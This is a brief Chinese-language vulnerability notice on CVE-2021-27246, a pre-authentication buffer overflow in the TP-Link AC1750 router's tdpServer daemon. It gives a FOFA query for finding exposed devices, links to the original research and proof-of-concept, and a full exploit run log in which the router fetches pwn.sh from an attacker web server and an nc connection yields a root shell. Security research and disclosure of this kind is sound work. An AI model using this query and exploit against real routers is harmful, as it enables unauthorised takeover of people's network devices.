TP-Link AC1750 预认证远程代码执行漏洞（CVE-2021-27246）

# TP-Link AC1750 预认证远程代码执行漏洞（CVE-2021-27246）

在TP-Link AC1750的tdpServer守护程序中存在漏洞，没有检查json数据的大小，导致了缓冲区溢出，通过缓冲区溢出，可以导致代码执行。

FOFA:

“`
app=”TP_LINK-AC1750″
“`

漏洞详情见：https://www.synacktiv.com/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html

poc：https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020

“`
$ bash exploit.sh
[+] Launching web server for distribution of pwn.sh
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) …
INFO:tdpwn:Associating 49 onemesh clients…
INFO:tdpwn:Done!
And wait for 80 seconds…
80 seconds left…
70 seconds left…
60 seconds left…
50 seconds left…
40 seconds left…
30 seconds left…
20 seconds left…
10 seconds left…
[+] Trying to exploit the tddp injection
INFO:tdp:Preparing tddpv1_configset payload
INFO:tdp:Sending payload

[+] Trying the root shell (Low probability of success…)
nc -v 192.168.0.1 12345
nc: connect to 192.168.0.1 port 12345 (tcp) failed: Connection refused

[ ] If shell hasn’t succeed, don’t worry, we retry

INFO:tdpwn:Associating 49 onemesh clients…
INFO:tdpwn:Done!
And wait for 80 seconds…
80 seconds left…
70 seconds left…
60 seconds left…
50 seconds left…
40 seconds left…
30 seconds left…
20 seconds left…
10 seconds left…
[+] Trying to exploit the tddp injection
INFO:tdp:Preparing tddpv1_configset payload
INFO:tdp:Sending payload
192.168.0.1 – – [30/Nov/2020 12:10:59] “GET /pwn.sh HTTP/1.1” 200 –

[+] Trying the root shell (High probability of success…)
nc -v 192.168.0.1 12345
Connection to 192.168.0.1 12345 port [tcp/*] succeeded!
uname -a
Linux ArcherA7v5 3.3.8 #1 Mon Sep 14 19:52:46 CST 2020 mips GNU/Linux
id
uid=0(root) gid=0(root)
^C[-] Stopping Webserver, now
Terminated
“`

ref:

* https://www.synacktiv.com/public … tp-link-ac1750.html
* https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020
* https://nvd.nist.gov/vuln/detail/CVE-2021-27246